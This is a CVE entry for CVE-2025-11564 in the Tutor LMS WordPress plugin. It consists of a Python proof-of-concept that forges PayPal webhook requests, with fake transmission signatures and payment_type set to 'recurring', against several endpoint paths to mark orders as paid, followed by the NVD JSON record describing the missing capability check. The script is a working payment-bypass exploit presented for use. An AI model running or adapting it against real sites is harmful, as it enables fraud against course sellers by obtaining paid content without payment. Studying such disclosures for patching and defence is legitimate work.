CVE-2025-11564

import requests import json # CVE-2025-11564 PoC - Tutor LMS Payment Verification Bypass # Target: WordPress site with Tutor LMS plugin < 3.8.4 TARGET_URL = "https://vulnerable-site.com" # The webhook endpoint varies, common paths: WEBHOOK_PATHS = [ "/wp-json/tutor/v1/webhook/paypal", "/?tutor_action=verify_paypal_webhook", "/wp-admin/admin-ajax.php?action=tutor_paypal_webhook" ] def create_malicious_webhook_request(): """ Forge a PayPal webhook request to mark order as paid This PoC demonstrates the missing authorization check """ payload = { "payment_type": "recurring", # Key parameter to bypass verification "order_id": "ATTACKER_CONTROLLED_ORDER_ID", "status": "completed", "amount": "0.01", "currency": "USD", "transaction_id": "MALICIOUS_TX_" + str(random.randint(100000, 999999)), "payer_email": "[email protected]" } headers = { "Content-Type": "application/json", "User-Agent": "PayPal-Webhook-Forge", "X-Paypal-Transmission-Id": "fake-transmission-id", "X-Paypal-Transmission-Time": "2025-01-01T00:00:00Z", "X-Paypal-Transmission-Sig": "fake-signature", "X-Paypal-Cert-Url": "" } return payload, headers def exploit(target_url): """Execute the payment verification bypass attack""" payload, headers = create_malicious_webhook_request() for path in WEBHOOK_PATHS: url = target_url + path try: response = requests.post(url, json=payload, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Possible successful exploitation at: {url}") print(f"[+] Response: {response.text}") else: print(f"[-] Failed at {url}: Status {response.status_code}") except requests.RequestException as e: print(f"[!] Error targeting {url}: {e}") if __name__ == "__main__": import random exploit(TARGET_URL)

{"cve": {"id": "CVE-2025-11564", "sourceIdentifier": "[email protected]", "published": "2025-10-25T06:15:35.307", "lastModified": "2025-12-05T00:26:48.090", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check while verifying webhook signatures on the \"verifyAndCreateOrderData\" function \r\nin all versions up to, and including, 3.8.3. This makes it possible for unauthenticated attackers to bypass payment verification and mark orders as paid by submitting forged webhook requests with `payment_type` set to 'recurring'."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:themeum:tutor_lms:*:*:*:*:free:wordpress:*:*", "versionEndExcluding": "3.9.0", "matchCriteriaId": "D66EBFF5-F51F-4A4E-85F5-321FAB6AD260"}]}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/tutor/tags/3.8.3/ecommerce/PaymentGateways/Paypal/src/Payments/Paypal/Paypal.php#L323", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/26289a93-063b-469a-9d09-c286d76fce0c?source=cve", "source": "[email protected]", "tags": ["Product", "Third Party Advisory"]}]}}